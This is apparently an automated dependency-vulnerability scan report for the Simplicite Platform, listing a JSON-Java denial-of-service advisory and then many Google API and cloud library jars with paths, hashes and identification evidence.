Denial of Service in JSON-Java versions up to and including 20230618. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
google-api-services-calendar-v3-rev20190910-1.30.1.jarLicense:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/apis/google-api-services-calendar/v3-rev20190910-1.30.1/google-api-services-calendar-v3-rev20190910-1.30.1.jar
MD5: 4cd619cd192be6dbf2c2c5a1413235ca
SHA1: a4c3ee04b4423ffabd7eb6da5d5b81b6e7bda6e3
SHA256: ca48258f6091be3fee8b2714ab1a93c413a36668e1213dae6d2669971c6342e8
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-api-services-calendar-v3-rev20190910 High Vendor jar package name api Highest Vendor jar package name calendar Highest Vendor jar package name google Highest Vendor jar package name services Highest Vendor Manifest automatic-module-name com.google.api.services.calendar Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor pom artifactid google-api-services-calendar Highest Vendor pom artifactid google-api-services-calendar Low Vendor pom groupid com.google.apis Highest Vendor pom name Calendar API v3-rev20190910-1.30.1 High Vendor pom organization name Google High Vendor pom organization url http://www.google.com/ Medium Product file name google-api-services-calendar-v3-rev20190910 High Product jar package name api Highest Product jar package name calendar Highest Product jar package name google Highest Product jar package name services Highest Product Manifest automatic-module-name com.google.api.services.calendar Medium Product Manifest build-jdk-spec 1.8 Low Product pom artifactid google-api-services-calendar Highest Product pom groupid com.google.apis Highest Product pom name Calendar API v3-rev20190910-1.30.1 High Product pom organization name Google Low Product pom organization url http://www.google.com/ Low Version pom version v3-rev20190910-1.30.1 Highest
google-api-services-drive-v3-rev20190822-1.30.1.jarLicense:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/apis/google-api-services-drive/v3-rev20190822-1.30.1/google-api-services-drive-v3-rev20190822-1.30.1.jar
MD5: 07819940f73a6147ab9952560ec66bbe
SHA1: a8511329b9f3b5be123913e8345d99ee700282bf
SHA256: 835babe90799f91cfb735b037d14cfa3305c2fffc6d7f753fc6df7fb74f83bea
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-api-services-drive-v3-rev20190822 High Vendor jar package name api Highest Vendor jar package name drive Highest Vendor jar package name google Highest Vendor jar package name services Highest Vendor Manifest automatic-module-name com.google.api.services.drive Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor pom artifactid google-api-services-drive Highest Vendor pom artifactid google-api-services-drive Low Vendor pom groupid com.google.apis Highest Vendor pom name Drive API v3-rev20190822-1.30.1 High Vendor pom organization name Google High Vendor pom organization url http://www.google.com/ Medium Product file name google-api-services-drive-v3-rev20190822 High Product jar package name api Highest Product jar package name drive Highest Product jar package name google Highest Product jar package name services Highest Product Manifest automatic-module-name com.google.api.services.drive Medium Product Manifest build-jdk-spec 1.8 Low Product pom artifactid google-api-services-drive Highest Product pom groupid com.google.apis Highest Product pom name Drive API v3-rev20190822-1.30.1 High Product pom organization name Google Low Product pom organization url http://www.google.com/ Low Version pom version v3-rev20190822-1.30.1 Highest
google-api-services-gmail-v1-rev20190602-1.30.1.jarLicense:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/apis/google-api-services-gmail/v1-rev20190602-1.30.1/google-api-services-gmail-v1-rev20190602-1.30.1.jar
MD5: c1e0bfbf80ce1273f1c95ec91e7fe8c7
SHA1: cdb3ede72771778923f960146a2f2dad3f29e7f0
SHA256: 3e50e9aa4a50d882912bd317993c0cbe9c4ef6fbc4e585d7ca2ddc2bc6aad0ab
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-api-services-gmail-v1-rev20190602 High Vendor jar package name api Highest Vendor jar package name gmail Highest Vendor jar package name google Highest Vendor jar package name services Highest Vendor Manifest automatic-module-name com.google.api.services.gmail Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor pom artifactid google-api-services-gmail Highest Vendor pom artifactid google-api-services-gmail Low Vendor pom groupid com.google.apis Highest Vendor pom name Gmail API v1-rev20190602-1.30.1 High Vendor pom organization name Google High Vendor pom organization url http://www.google.com/ Medium Product file name google-api-services-gmail-v1-rev20190602 High Product jar package name api Highest Product jar package name gmail Highest Product jar package name google Highest Product jar package name services Highest Product Manifest automatic-module-name com.google.api.services.gmail Medium Product Manifest build-jdk-spec 1.8 Low Product pom artifactid google-api-services-gmail Highest Product pom groupid com.google.apis Highest Product pom name Gmail API v1-rev20190602-1.30.1 High Product pom organization name Google Low Product pom organization url http://www.google.com/ Low Version pom version v1-rev20190602-1.30.1 Highest
google-api-services-plus-v1-rev20190328-1.30.1.jarLicense:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/apis/google-api-services-plus/v1-rev20190328-1.30.1/google-api-services-plus-v1-rev20190328-1.30.1.jar
MD5: d190b6cd10aee91d96975ee633ad4101
SHA1: 5d37538b7be26f10dff011cfb30bbf3ab9d8f19f
SHA256: 6609b0440916f3c66197ed795f7642ae481a81bfb9b1f81da29928cf85a49891
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-api-services-plus-v1-rev20190328 High Vendor jar package name api Highest Vendor jar package name google Highest Vendor jar package name plus Highest Vendor jar package name services Highest Vendor Manifest automatic-module-name com.google.api.services.plus Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor pom artifactid google-api-services-plus Highest Vendor pom artifactid google-api-services-plus Low Vendor pom groupid com.google.apis Highest Vendor pom name Google+ API v1-rev20190328-1.30.1 High Vendor pom organization name Google High Vendor pom organization url http://www.google.com/ Medium Product file name google-api-services-plus-v1-rev20190328 High Product jar package name api Highest Product jar package name google Highest Product jar package name plus Highest Product jar package name services Highest Product Manifest automatic-module-name com.google.api.services.plus Medium Product Manifest build-jdk-spec 1.8 Low Product pom artifactid google-api-services-plus Highest Product pom groupid com.google.apis Highest Product pom name Google+ API v1-rev20190328-1.30.1 High Product pom organization name Google Low Product pom organization url http://www.google.com/ Low Version pom version v1-rev20190328-1.30.1 Highest
google-api-services-sheets-v4-rev20190813-1.30.1.jarLicense:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/apis/google-api-services-sheets/v4-rev20190813-1.30.1/google-api-services-sheets-v4-rev20190813-1.30.1.jar
MD5: bda6f69acea39cf97f8ae87078c8ba50
SHA1: 0b753378dba91d8753a9948da270cb9c3d49501e
SHA256: 8ebfd01900640228890d6db056b311e7e437490d127becd8ab9ca3bc64ec9db6
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-api-services-sheets-v4-rev20190813 High Vendor jar package name api Highest Vendor jar package name google Highest Vendor jar package name services Highest Vendor jar package name sheets Highest Vendor Manifest automatic-module-name com.google.api.services.sheets Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor pom artifactid google-api-services-sheets Highest Vendor pom artifactid google-api-services-sheets Low Vendor pom groupid com.google.apis Highest Vendor pom name Google Sheets API v4-rev20190813-1.30.1 High Vendor pom organization name Google High Vendor pom organization url http://www.google.com/ Medium Product file name google-api-services-sheets-v4-rev20190813 High Product jar package name api Highest Product jar package name google Highest Product jar package name services Highest Product jar package name sheets Highest Product Manifest automatic-module-name com.google.api.services.sheets Medium Product Manifest build-jdk-spec 1.8 Low Product pom artifactid google-api-services-sheets Highest Product pom groupid com.google.apis Highest Product pom name Google Sheets API v4-rev20190813-1.30.1 High Product pom organization name Google Low Product pom organization url http://www.google.com/ Low Version pom version v4-rev20190813-1.30.1 Highest
google-api-services-storage-v1-rev20190624-1.30.1.jarLicense:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/apis/google-api-services-storage/v1-rev20190624-1.30.1/google-api-services-storage-v1-rev20190624-1.30.1.jar
MD5: 64fc59d905430afb5ab42b670ff9fdd2
SHA1: 965c7c4f92f4a4058b6759505c6f520fb0033832
SHA256: 3d3b56deab3b97ef75ea1360b3170aa5a3872566274938618a6dc0e86343bbe1
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-api-services-storage-v1-rev20190624 High Vendor jar package name api Highest Vendor jar package name google Highest Vendor jar package name services Highest Vendor jar package name storage Highest Vendor Manifest automatic-module-name com.google.api.services.storage Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor pom artifactid google-api-services-storage Highest Vendor pom artifactid google-api-services-storage Low Vendor pom groupid com.google.apis Highest Vendor pom name Cloud Storage JSON API v1-rev20190624-1.30.1 High Vendor pom organization name Google High Vendor pom organization url http://www.google.com/ Medium Product file name google-api-services-storage-v1-rev20190624 High Product jar package name api Highest Product jar package name google Highest Product jar package name services Highest Product jar package name storage Highest Product Manifest automatic-module-name com.google.api.services.storage Medium Product Manifest build-jdk-spec 1.8 Low Product pom artifactid google-api-services-storage Highest Product pom groupid com.google.apis Highest Product pom name Cloud Storage JSON API v1-rev20190624-1.30.1 High Product pom organization name Google Low Product pom organization url http://www.google.com/ Low Version pom version v1-rev20190624-1.30.1 Highest
google-api-services-translate-v2-rev20170525-1.30.1.jarLicense:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/apis/google-api-services-translate/v2-rev20170525-1.30.1/google-api-services-translate-v2-rev20170525-1.30.1.jar
MD5: 49b810431970d3585119ebae4d372955
SHA1: d190fa670e88901a2e5247ea394f7ae2cc394c15
SHA256: ae3b32be4e5a9450a36f8fed26ea5f26bc624ec15fb4a0f1160c6c8cf0e35559
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-api-services-translate-v2-rev20170525 High Vendor jar package name api Highest Vendor jar package name google Highest Vendor jar package name services Highest Vendor jar package name translate Highest Vendor Manifest automatic-module-name com.google.api.services.translate Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor pom artifactid google-api-services-translate Highest Vendor pom artifactid google-api-services-translate Low Vendor pom groupid com.google.apis Highest Vendor pom name Google Cloud Translation API v2-rev20170525-1.30.1 High Vendor pom organization name Google High Vendor pom organization url http://www.google.com/ Medium Product file name google-api-services-translate-v2-rev20170525 High Product jar package name api Highest Product jar package name google Highest Product jar package name services Highest Product jar package name translate Highest Product Manifest automatic-module-name com.google.api.services.translate Medium Product Manifest build-jdk-spec 1.8 Low Product pom artifactid google-api-services-translate Highest Product pom groupid com.google.apis Highest Product pom name Google Cloud Translation API v2-rev20170525-1.30.1 High Product pom organization name Google Low Product pom organization url http://www.google.com/ Low Version pom version v2-rev20170525-1.30.1 Highest
google-api-services-youtube-v3-rev20190827-1.30.1.jarLicense:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/apis/google-api-services-youtube/v3-rev20190827-1.30.1/google-api-services-youtube-v3-rev20190827-1.30.1.jar
MD5: de23af4810f28bc7e19a236704b5c35a
SHA1: f200641b91698b977a8fbf2c671711b73fadbc14
SHA256: 5790dac99030ec79b164da72c1a6690f4724b8e2b19ee73cd4cadf78a5231e71
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-api-services-youtube-v3-rev20190827 High Vendor jar package name api Highest Vendor jar package name google Highest Vendor jar package name services Highest Vendor jar package name youtube Highest Vendor Manifest automatic-module-name com.google.api.services.youtube Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor pom artifactid google-api-services-youtube Highest Vendor pom artifactid google-api-services-youtube Low Vendor pom groupid com.google.apis Highest Vendor pom name YouTube Data API v3-rev20190827-1.30.1 High Vendor pom organization name Google High Vendor pom organization url http://www.google.com/ Medium Product file name google-api-services-youtube-v3-rev20190827 High Product jar package name api Highest Product jar package name google Highest Product jar package name services Highest Product jar package name youtube Highest Product Manifest automatic-module-name com.google.api.services.youtube Medium Product Manifest build-jdk-spec 1.8 Low Product pom artifactid google-api-services-youtube Highest Product pom groupid com.google.apis Highest Product pom name YouTube Data API v3-rev20190827-1.30.1 High Product pom organization name Google Low Product pom organization url http://www.google.com/ Low Version pom version v3-rev20190827-1.30.1 Highest
google-auth-library-credentials-0.17.1.jarFile Path: /var/simplicite/.m2/repository/com/google/auth/google-auth-library-credentials/0.17.1/google-auth-library-credentials-0.17.1.jarMD5: 08a308ff0a817928c3e2b0d526174d52SHA1: c4be8a5be14299801b346233be515fc9a5a87c83SHA256: aaeea9333fff9b763715bca0174ec76c4f9551b5731c89a95f263cdc82b4b56eReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-auth-library-credentials High Vendor jar package name auth Highest Vendor jar package name credentials Highest Vendor jar package name google Highest Vendor Manifest automatic-module-name com.google.auth Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor pom artifactid google-auth-library-credentials Highest Vendor pom artifactid google-auth-library-credentials Low Vendor pom groupid com.google.auth Highest Vendor pom name Google Auth Library for Java - Credentials High Vendor pom parent-artifactid google-auth-library-parent Low Product file name google-auth-library-credentials High Product jar package name auth Highest Product jar package name credentials Highest Product jar package name google Highest Product Manifest automatic-module-name com.google.auth Medium Product Manifest build-jdk-spec 1.8 Low Product pom artifactid google-auth-library-credentials Highest Product pom groupid com.google.auth Highest Product pom name Google Auth Library for Java - Credentials High Product pom parent-artifactid google-auth-library-parent Medium Version file version 0.17.1 High Version pom version 0.17.1 Highest
google-auth-library-oauth2-http-0.17.1.jarFile Path: /var/simplicite/.m2/repository/com/google/auth/google-auth-library-oauth2-http/0.17.1/google-auth-library-oauth2-http-0.17.1.jarMD5: 618b04b4e97c0b38557f1c2b53d4c674SHA1: 740f5e93a9e934f7016d6b494c85cdaa3a436937SHA256: fa9a1589c8bc279416988d437c2636967cd5e4eff70fbddc986b9c5a77b0231bReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-auth-library-oauth2-http High Vendor jar package name auth Highest Vendor jar package name google Highest Vendor jar package name http Highest Vendor jar package name oauth2 Highest Vendor Manifest automatic-module-name com.google.auth.oauth2 Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor pom artifactid google-auth-library-oauth2-http Highest Vendor pom artifactid google-auth-library-oauth2-http Low Vendor pom groupid com.google.auth Highest Vendor pom name Google Auth Library for Java - OAuth2 HTTP High Vendor pom parent-artifactid google-auth-library-parent Low Product file name google-auth-library-oauth2-http High Product jar package name auth Highest Product jar package name google Highest Product jar package name http Highest Product jar package name oauth2 Highest Product Manifest automatic-module-name com.google.auth.oauth2 Medium Product Manifest build-jdk-spec 1.8 Low Product pom artifactid google-auth-library-oauth2-http Highest Product pom groupid com.google.auth Highest Product pom name Google Auth Library for Java - OAuth2 HTTP High Product pom parent-artifactid google-auth-library-parent Medium Version file version 0.17.1 High Version pom version 0.17.1 Highest
google-cloud-core-1.90.0.jarDescription:
Core module for the google-cloud.
File Path: /var/simplicite/.m2/repository/com/google/cloud/google-cloud-core/1.90.0/google-cloud-core-1.90.0.jarMD5: 50e8e61b319970ad1618ed735bd671efSHA1: ebf5901e8c804ea436856211d066305a0ee1633cSHA256: dddde94df91ec81ba492d7b105dbd1adb5efc798c9fff1e9bde37c75ec4ca374Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-cloud-core High Vendor jar package name cloud Highest Vendor jar package name google Highest Vendor Manifest artifactid google-cloud-core Low Vendor Manifest implementation-url https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core Low Vendor Manifest Implementation-Vendor Google LLC High Vendor Manifest Implementation-Vendor-Id com.google.cloud Medium Vendor Manifest specification-vendor Google LLC Low Vendor pom artifactid google-cloud-core Highest Vendor pom artifactid google-cloud-core Low Vendor pom groupid com.google.cloud Highest Vendor pom name Google Cloud Core High Vendor pom parent-artifactid google-cloud-clients Low Vendor pom url googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core Highest Product file name google-cloud-core High Product jar package name cloud Highest Product jar package name google Highest Product Manifest artifactid google-cloud-core Low Product Manifest Implementation-Title Google Cloud Core High Product Manifest implementation-url https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core Low Product Manifest specification-title Google Cloud Core Medium Product pom artifactid google-cloud-core Highest Product pom groupid com.google.cloud Highest Product pom name Google Cloud Core High Product pom parent-artifactid google-cloud-clients Medium Product pom url googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core High Version file version 1.90.0 High Version Manifest Implementation-Version 1.90.0 High Version Manifest version 1.90.0 Medium Version pom parent-version 1.90.0 Low Version pom version 1.90.0 Highest
google-cloud-core-grpc-1.90.0.jarDescription:
Core gRPC module for the google-cloud.
File Path: /var/simplicite/.m2/repository/com/google/cloud/google-cloud-core-grpc/1.90.0/google-cloud-core-grpc-1.90.0.jarMD5: 15da4e1c8fb6e637441199a972e93da0SHA1: a254b7d693b9ec721600799ebabf679a71855ac7SHA256: cd771d2c260336e1dd292600b2dd33949b0b1045fee9c8df5e9a8e94c35d3989Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-cloud-core-grpc High Vendor jar package name cloud Highest Vendor jar package name google Highest Vendor jar package name grpc Highest Vendor Manifest artifactid google-cloud-core-grpc Low Vendor Manifest implementation-url https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core-grpc Low Vendor Manifest Implementation-Vendor Google LLC High Vendor Manifest Implementation-Vendor-Id com.google.cloud Medium Vendor Manifest specification-vendor Google LLC Low Vendor pom artifactid google-cloud-core-grpc Highest Vendor pom artifactid google-cloud-core-grpc Low Vendor pom groupid com.google.cloud Highest Vendor pom name Google Cloud Core gRPC High Vendor pom parent-artifactid google-cloud-clients Low Vendor pom url googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core-grpc Highest Product file name google-cloud-core-grpc High Product jar package name cloud Highest Product jar package name google Highest Product jar package name grpc Highest Product Manifest artifactid google-cloud-core-grpc Low Product Manifest Implementation-Title Google Cloud Core gRPC High Product Manifest implementation-url https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core-grpc Low Product Manifest specification-title Google Cloud Core gRPC Medium Product pom artifactid google-cloud-core-grpc Highest Product pom groupid com.google.cloud Highest Product pom name Google Cloud Core gRPC High Product pom parent-artifactid google-cloud-clients Medium Product pom url googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core-grpc High Version file version 1.90.0 High Version Manifest Implementation-Version 1.90.0 High Version Manifest version 1.90.0 Medium Version pom parent-version 1.90.0 Low Version pom version 1.90.0 Highest
google-cloud-core-http-1.90.0.jarDescription:
Core http module for the google-cloud.
File Path: /var/simplicite/.m2/repository/com/google/cloud/google-cloud-core-http/1.90.0/google-cloud-core-http-1.90.0.jarMD5: 1a34150c8f95c83c515f3caaa0533c68SHA1: 9098b197d4f84aa79346d7489c44a169066b3a0bSHA256: 865be501475bde92c41c938f0b100394034e0485ee8921c5e709377f01574731Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-cloud-core-http High Vendor jar package name cloud Highest Vendor jar package name google Highest Vendor jar package name http Highest Vendor Manifest artifactid google-cloud-core-http Low Vendor Manifest implementation-url https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core-http Low Vendor Manifest Implementation-Vendor Google LLC High Vendor Manifest Implementation-Vendor-Id com.google.cloud Medium Vendor Manifest specification-vendor Google LLC Low Vendor pom artifactid google-cloud-core-http Highest Vendor pom artifactid google-cloud-core-http Low Vendor pom groupid com.google.cloud Highest Vendor pom name Google Cloud Core HTTP High Vendor pom parent-artifactid google-cloud-clients Low Vendor pom url googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core-http Highest Product file name google-cloud-core-http High Product jar package name cloud Highest Product jar package name google Highest Product jar package name http Highest Product Manifest artifactid google-cloud-core-http Low Product Manifest Implementation-Title Google Cloud Core HTTP High Product Manifest implementation-url https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core-http Low Product Manifest specification-title Google Cloud Core HTTP Medium Product pom artifactid google-cloud-core-http Highest Product pom groupid com.google.cloud Highest Product pom name Google Cloud Core HTTP High Product pom parent-artifactid google-cloud-clients Medium Product pom url googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core-http High Version file version 1.90.0 High Version Manifest Implementation-Version 1.90.0 High Version Manifest version 1.90.0 Medium Version pom parent-version 1.90.0 Low Version pom version 1.90.0 Highest
google-cloud-firestore-1.9.0.jarDescription:
Java idiomatic client for Google Cloud Firestore.
File Path: /var/simplicite/.m2/repository/com/google/cloud/google-cloud-firestore/1.9.0/google-cloud-firestore-1.9.0.jarMD5: 3eb1110fb18baf2375dbfa6e20a80c87SHA1: f6364bba713915d21b7eda43e3f65dab743b09bdSHA256: 0428ec9394c118b4736882723e7da83434446fe8447b31bef7e10928ff7aaa21Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-cloud-firestore High Vendor jar package name cloud Highest Vendor jar package name firestore Highest Vendor jar package name google Highest Vendor Manifest artifactid google-cloud-firestore Low Vendor Manifest implementation-url https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-firestore Low Vendor Manifest Implementation-Vendor Google LLC High Vendor Manifest Implementation-Vendor-Id com.google.cloud Medium Vendor Manifest specification-vendor Google LLC Low Vendor pom artifactid google-cloud-firestore Highest Vendor pom artifactid google-cloud-firestore Low Vendor pom groupid com.google.cloud Highest Vendor pom name Google Cloud Firestore High Vendor pom parent-artifactid google-cloud-clients Low Vendor pom url googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-firestore
Highest Product file name google-cloud-firestore High Product jar package name cloud Highest Product jar package name firestore Highest Product jar package name google Highest Product Manifest artifactid google-cloud-firestore Low Product Manifest Implementation-Title Google Cloud Firestore High Product Manifest implementation-url https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-firestore Low Product Manifest specification-title Google Cloud Firestore Medium Product pom artifactid google-cloud-firestore Highest Product pom groupid com.google.cloud Highest Product pom name Google Cloud Firestore High Product pom parent-artifactid google-cloud-clients Medium Product pom url googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-firestore
High Version file version 1.9.0 High Version Manifest Implementation-Version 1.9.0 High Version Manifest version 1.9.0 Medium Version pom parent-version 1.9.0 Low Version pom version 1.9.0 Highest
google-cloud-pubsub-1.91.0.jarDescription:
Java idiomatic client for Google Cloud Pub/Sub.
File Path: /var/simplicite/.m2/repository/com/google/cloud/google-cloud-pubsub/1.91.0/google-cloud-pubsub-1.91.0.jarMD5: ce6917c11376843f58ae833b9474e871SHA1: e446bc05cc5c16b1a2e87b5ebd0c2505f7d5cf85SHA256: af60e5dcc43a53314bce85d283fd7a92115cd98c4a5424f4454f08742e0e4d61Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-cloud-pubsub High Vendor jar package name cloud Highest Vendor jar package name google Highest Vendor jar package name pubsub Highest Vendor Manifest artifactid google-cloud-pubsub Low Vendor Manifest implementation-url https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-pubsub Low Vendor Manifest Implementation-Vendor Google LLC High Vendor Manifest Implementation-Vendor-Id com.google.cloud Medium Vendor Manifest specification-vendor Google LLC Low Vendor pom artifactid google-cloud-pubsub Highest Vendor pom artifactid google-cloud-pubsub Low Vendor pom groupid com.google.cloud Highest Vendor pom name Google Cloud Pub/Sub High Vendor pom parent-artifactid google-cloud-clients Low Vendor pom url googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-pubsub Highest Product file name google-cloud-pubsub High Product jar package name cloud Highest Product jar package name google Highest Product jar package name pubsub Highest Product Manifest artifactid google-cloud-pubsub Low Product Manifest Implementation-Title Google Cloud Pub/Sub High Product Manifest implementation-url https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-pubsub Low Product Manifest specification-title Google Cloud Pub/Sub Medium Product pom artifactid google-cloud-pubsub Highest Product pom groupid com.google.cloud Highest Product pom name Google Cloud Pub/Sub High Product pom parent-artifactid google-cloud-clients Medium Product pom url googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-pubsub High Version file version 1.91.0 High Version Manifest Implementation-Version 1.91.0 High Version Manifest version 1.91.0 Medium Version pom parent-version 1.91.0 Low Version pom version 1.91.0 Highest
google-cloud-storage-1.91.0.jarDescription:
Java idiomatic client for Google Cloud Storage.
File Path: /var/simplicite/.m2/repository/com/google/cloud/google-cloud-storage/1.91.0/google-cloud-storage-1.91.0.jarMD5: 13b2e0b5ab6841d88e35e144836e30ccSHA1: 73d7d28a8111ee318b5f4c62fcdb23f57a1066d3SHA256: 1710c51873f39b25210860f09cfd0c4c4824c1265b41cf136fe21266cf73faa4Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-cloud-storage High Vendor jar package name cloud Highest Vendor jar package name google Highest Vendor jar package name storage Highest Vendor Manifest artifactid google-cloud-storage Low Vendor Manifest implementation-url https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-storage Low Vendor Manifest Implementation-Vendor Google LLC High Vendor Manifest Implementation-Vendor-Id com.google.cloud Medium Vendor Manifest specification-vendor Google LLC Low Vendor pom artifactid google-cloud-storage Highest Vendor pom artifactid google-cloud-storage Low Vendor pom groupid com.google.cloud Highest Vendor pom name Google Cloud Storage High Vendor pom parent-artifactid google-cloud-clients Low Vendor pom url googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-storage Highest Product file name google-cloud-storage High Product jar package name cloud Highest Product jar package name google Highest Product jar package name storage Highest Product Manifest artifactid google-cloud-storage Low Product Manifest Implementation-Title Google Cloud Storage High Product Manifest implementation-url https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-storage Low Product Manifest specification-title Google Cloud Storage Medium Product pom artifactid google-cloud-storage Highest Product pom groupid com.google.cloud Highest Product pom name Google Cloud Storage High Product pom parent-artifactid google-cloud-clients Medium Product pom url googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-storage High Version file version 1.91.0 High Version Manifest Implementation-Version 1.91.0 High Version Manifest version 1.91.0 Medium Version pom parent-version 1.91.0 Low Version pom version 1.91.0 Highest
google-cloud-storage-2.2.0.jarDescription:
jclouds components to access Google Cloud Storage License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/jclouds/provider/google-cloud-storage/2.2.0/google-cloud-storage-2.2.0.jar
MD5: a6e9c25c62e358de98c9b5baefcfc9c9
SHA1: edd29f3d986aa041c0181a88eda4011cb08c2500
SHA256: 6d3af5f58f8a1eec40609dada045f21ecc63e22e30550ad153a366b53fbf1a6b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-cloud-storage High Vendor jar package name jclouds Highest Vendor Manifest bundle-docurl http://www.apache.org/ Low Vendor Manifest bundle-symbolicname google-cloud-storage Medium Vendor Manifest Implementation-Vendor jclouds High Vendor Manifest Implementation-Vendor-Id org.jclouds Medium Vendor Manifest specification-vendor jclouds Low Vendor pom artifactid google-cloud-storage Highest Vendor pom artifactid google-cloud-storage Low Vendor pom groupid org.apache.jclouds.provider Highest Vendor pom name jclouds Google Cloud Storage provider High Vendor pom parent-artifactid jclouds-project Low Vendor pom parent-groupid org.apache.jclouds Medium Product file name google-cloud-storage High Product jar package name jclouds Highest Product Manifest bundle-docurl http://www.apache.org/ Low Product Manifest Bundle-Name jclouds Google Cloud Storage provider Medium Product Manifest bundle-symbolicname google-cloud-storage Medium Product Manifest Implementation-Title jclouds Google Cloud Storage provider High Product Manifest specification-title jclouds jclouds Google Cloud Storage provider Medium Product pom artifactid google-cloud-storage Highest Product pom groupid org.apache.jclouds.provider Highest Product pom name jclouds Google Cloud Storage provider High Product pom parent-artifactid jclouds-project Medium Product pom parent-groupid org.apache.jclouds Medium Version file version 2.2.0 High Version Manifest Bundle-Version 2.2.0 High Version Manifest Implementation-Version 2.2.0 High Version pom version 2.2.0 Highest
google-http-client-1.32.0.jarDescription:
Google HTTP Client Library for Java. Functionality that works on all supported Java platforms,
including Java 7 (or higher) desktop (SE) and web (EE), Android, and Google App Engine.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/http-client/google-http-client/1.32.0/google-http-client-1.32.0.jar
MD5: 159df863621fa372f142eb49def7ea62
SHA1: 2b45a89cd795c70ccb203d5b20cc13b50105e71e
SHA256: 6fd9e819d8d75bcedcb2ba9d8e08496b5160b3f855a50057f5d9f6850bbf0e4c
Referenced In Project/Scope: Simplicite Platform:compile
